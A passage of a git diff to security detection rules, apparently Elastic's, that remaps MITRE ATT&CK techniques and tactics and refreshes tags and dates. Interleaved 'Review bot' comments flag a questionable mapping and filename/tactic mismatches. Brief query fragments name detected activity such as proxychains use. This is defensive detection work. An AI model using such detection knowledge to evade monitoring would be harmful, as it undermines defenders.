+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1136"
+name = "Create Account"
+reference = "https://attack.mitre.org/techniques/T1136/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml
index afb390d2236..bb3d1645ebc 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_rare_group_name_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -81,41 +81,35 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Discovery", "Tactic: Privilege Escalation", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
-
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.007"
+name = "Additional Local or Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1098/007/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml
index f7407fd1638..4a71ea94c33 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_rare_privilege_assigned_to_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -89,19 +89,13 @@ tags = [
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1068"
-name = "Exploitation for Privilege Escalation"
-reference = "https://attack.mitre.org/techniques/T1068/"
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml
index c3078e43d19..4bc54d76a48 100644
--- a/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml
+++ b/rules/integrations/pad/privileged_access_ml_windows_rare_region_name_by_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/18"
 integration = ["pad", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -79,24 +79,17 @@ The Privileged Access Detection integration detects privileged access activity b
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
-    "Use Case: Privileged Access Detection",
-    "Rule Type: ML",
-    "Rule Type: Machine Learning",
-    "Tactic: Privilege Escalation",
-    "Resources: Investigation Guide",
-]
+tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml
index 24db21c141b..49333d5a47a 100644
--- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml
+++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_host.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/19"
 integration = ["problemchild", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -90,16 +90,3 @@ tags = [
     "Resources: Investigation Guide",
 ]
 type = "machine_learning"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml
index abb8bb47e03..ee6dee10815 100644
--- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml
+++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_parent_process.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/16"
 integration = ["problemchild", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -92,16 +92,3 @@ tags = [
     "Resources: Investigation Guide",
 ]
 type = "machine_learning"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml
index 513d1a8b875..640761874bc 100644
--- a/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml
+++ b/rules/integrations/problemchild/defense_evasion_ml_rare_process_for_a_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/16"
 integration = ["problemchild", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -82,26 +82,30 @@ The LotL Attack Detection integration detects living-off-the-land activity in Wi
 - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**.
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Living off the Land Attack Detection",
- "Rule Type: ML",
- "Rule Type: Machine Learning",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Living off the Land Attack Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml
index c9d776c0b19..3fbffb61ab0 100644
--- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml
+++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_high_probability.toml
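Review bot: The new Execution entry maps `T1204` User Execution, which ATT&CK reserves for activity that depends on a user being induced to run something; nothing in this hunk (an ML rule tagged "Use Case: Living off the Land Attack Detection" with `T1218` under Defense Evasion) signals user interaction, so `T1059` Command and Scripting Interpreter may be the intended technique — worth confirming against the job's feature set before this mapping ships. If User Execution is deliberate, a one-line `# NOTE:` above the second `[[rule.threat]]` stating why would stop the next retagging pass from "correcting" it.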
@@ -2,7 +2,7 @@
 creation_date = "2023/10/16"
 integration = ["problemchild", "endpoint"]
 maturity = "production"
-updated_date = "2026/02/05"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -113,21 +113,3 @@ not (process.parent.name : "opera.exe" and process.command_line: "*--type=render
 '''
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-[[rule.threat.technique.subtechnique]]
-id = "T1036.004"
-name = "Masquerade Task or Service"
-reference = "https://attack.mitre.org/techniques/T1036/004/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml
index 283a4020daf..45959ad908c 100644
--- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml
+++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_event_low_probability.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/16"
 integration = ["problemchild", "endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -117,21 +117,3 @@ The detection leverages a machine learning model to identify potentially suspici
 - Escalate the incident to the security operations center (SOC) or relevant security team for further analysis and to determine if additional systems are affected."""
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-[[rule.threat.technique.subtechnique]]
-id = "T1036.004"
-name = "Masquerade Task or Service"
-reference = "https://attack.mitre.org/techniques/T1036/004/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml
index 22b4da6597d..eaeea2b1bae 100644
--- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml
+++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_host.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/16"
 integration = ["problemchild", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -91,16 +91,3 @@ tags = [
 "Resources: Investigation Guide",
 ]
 type = "machine_learning"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml
index 7b94ae3ca14..c23efcce91d 100644
--- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml
+++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_parent_process.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/16"
 integration = ["problemchild", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -93,16 +93,3 @@ tags = [
 "Resources: Investigation Guide",
 ]
 type = "machine_learning"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml
index a5b82dcbbf8..0d020444c91 100644
--- a/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml
+++ b/rules/integrations/problemchild/defense_evasion_ml_suspicious_windows_process_cluster_from_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/16"
 integration = ["problemchild", "endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -93,16 +93,3 @@ tags = [
 "Resources: Investigation Guide",
 ]
 type = "machine_learning"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1036"
-name = "Masquerading"
-reference = "https://attack.mitre.org/techniques/T1036/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml
index 2bbc37b2ccd..d685f0e9f35 100644
--- a/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml
+++ b/rules/linux/command_and_control_aws_cli_endpoint_url_used.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/21"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/09/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -90,15 +90,19 @@ The AWS CLI allows users to interact with AWS services via command-line, offerin
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1102"
-name = "Web Service"
-reference = "https://attack.mitre.org/techniques/T1102/"
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1071.001"
+name = "Web Protocols"
+reference = "https://attack.mitre.org/techniques/T1071/001/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id"]
diff --git a/rules/linux/command_and_control_cat_network_activity.toml b/rules/linux/command_and_control_cat_network_activity.toml
index cab972324d4..ce9bc194297 100644
--- a/rules/linux/command_and_control_cat_network_activity.toml
+++ b/rules/linux/command_and_control_cat_network_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/09/16"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -128,14 +128,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Command and Control",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence by host.id, process.entity_id with maxspan=3s
@@ -156,6 +149,11 @@ sequence by host.id, process.entity_id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
@@ -164,13 +162,15 @@ reference = "https://attack.mitre.org/tactics/TA0011/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1048"
+name = "Exfiltration Over Alternative Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+[[rule.threat.technique.subtechnique]]
+id = "T1048.003"
+name = "Exfiltration Over Unencrypted Non-C2 Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/003/"
 [rule.threat.tactic]
 id = "TA0010"
diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml
index 5356874e6a6..ec8b3e38082 100644
--- a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml
+++ b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/09/27"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/04"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -97,15 +97,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Use Case: Vulnerability",
- "Tactic: Command and Control",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence by host.id with maxspan=10s
@@ -119,13 +111,15 @@ sequence by host.id with maxspan=10s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
 [[rule.threat.technique]]
 id = "T1203"
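Review bot: After this hunk the first `[[rule.threat]]` entry of `command_and_control_cupsd_foomatic_rip_netcon.toml` is the Execution one (`T1059.004` here, `T1203` under `TA0002` past the hunk end) and the Command and Control entry is removed, so the `command_and_control_` filename prefix no longer matches any mapped tactic. If the suite's filename-by-primary-tactic check is still active this will presumably fail; either rename the file to the `execution_` prefix or keep a C2 mapping alongside. The same prefix/primary-tactic drift appears in `command_and_control_linux_kworker_netcon.toml` (only Defense Evasion remains), in both `credential_access_collection_sensitive_files*.toml` files where the reorder puts Collection first, and in `credential_access_gdb_process_hooking.toml` where the new Collection entry is inserted ahead of Credential Access. The `[[rule.threat]]` table this hunk rewrites continues past the hunk end.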
@@ -136,19 +130,3 @@ reference = "https://attack.mitre.org/techniques/T1203/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
diff --git a/rules/linux/command_and_control_curl_socks_proxy_detected.toml b/rules/linux/command_and_control_curl_socks_proxy_detected.toml
index cfdde4aab58..62bb09e0ed4 100644
--- a/rules/linux/command_and_control_curl_socks_proxy_detected.toml
+++ b/rules/linux/command_and_control_curl_socks_proxy_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/09/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -125,9 +125,9 @@ Curl is a versatile command-line tool used for transferring data with URLs, ofte
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1572"
-name = "Protocol Tunneling"
-reference = "https://attack.mitre.org/techniques/T1572/"
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
 [rule.threat.tactic]
 id = "TA0011"
diff --git a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml
index 8e5b77e396f..ebb3cfff1cb 100644
--- a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml
+++ b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/25"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/09/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -117,9 +117,9 @@ sequence by process.entity_id, host.id with maxspan=10s
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
 [rule.threat.tactic]
 id = "TA0011"
diff --git a/rules/linux/command_and_control_ip_forwarding_activity.toml b/rules/linux/command_and_control_ip_forwarding_activity.toml
index f810448aa2e..3357c9ea7ff 100644
--- a/rules/linux/command_and_control_ip_forwarding_activity.toml
+++ b/rules/linux/command_and_control_ip_forwarding_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -93,9 +93,14 @@ not (
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1572"
-name = "Protocol Tunneling"
-reference = "https://attack.mitre.org/techniques/T1572/"
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1090.001"
+name = "Internal Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/001/"
 [rule.threat.tactic]
 id = "TA0011"
diff --git a/rules/linux/command_and_control_kubectl_networking_modification.toml b/rules/linux/command_and_control_kubectl_networking_modification.toml
index 7eb417f4e4d..43c150612d1 100644
--- a/rules/linux/command_and_control_kubectl_networking_modification.toml
+++ b/rules/linux/command_and_control_kubectl_networking_modification.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/05"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -122,16 +122,16 @@ process.name == "kubectl" and (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1572"
-name = "Protocol Tunneling"
-reference = "https://attack.mitre.org/techniques/T1572/"
-
 [[rule.threat.technique]]
 id = "T1090"
 name = "Proxy"
 reference = "https://attack.mitre.org/techniques/T1090/"
+[[rule.threat.technique]]
+id = "T1572"
+name = "Protocol Tunneling"
+reference = "https://attack.mitre.org/techniques/T1572/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/command_and_control_linux_kworker_netcon.toml b/rules/linux/command_and_control_linux_kworker_netcon.toml
index acd204dae9a..49fe7f35a5a 100644
--- a/rules/linux/command_and_control_linux_kworker_netcon.toml
+++ b/rules/linux/command_and_control_linux_kworker_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/18"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/01/24"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -46,14 +46,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Command and Control",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -110,42 +103,20 @@ Kworker processes are integral to Linux systems, handling kernel tasks like inte
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1014"
-name = "Rootkit"
-reference = "https://attack.mitre.org/techniques/T1014/"
-
 [[rule.threat.technique]]
 id = "T1036"
 name = "Masquerading"
 reference = "https://attack.mitre.org/techniques/T1036/"
+[[rule.threat.technique.subtechnique]]
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1041"
-name = "Exfiltration Over C2 Channel"
-reference = "https://attack.mitre.org/techniques/T1041/"
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.name", "host.id"]
diff --git a/rules/linux/command_and_control_linux_proxychains_activity.toml b/rules/linux/command_and_control_linux_proxychains_activity.toml
index c86530e3580..86f11516b7b 100644
--- a/rules/linux/command_and_control_linux_proxychains_activity.toml
+++ b/rules/linux/command_and_control_linux_proxychains_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/23"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -140,9 +140,9 @@ process.name == "proxychains"
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1572"
-name = "Protocol Tunneling"
-reference = "https://attack.mitre.org/techniques/T1572/"
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
 [rule.threat.tactic]
 id = "TA0011"
diff --git a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml
index b4d383c26e2..0eb28ef7597 100644
--- a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml
+++ b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/23"
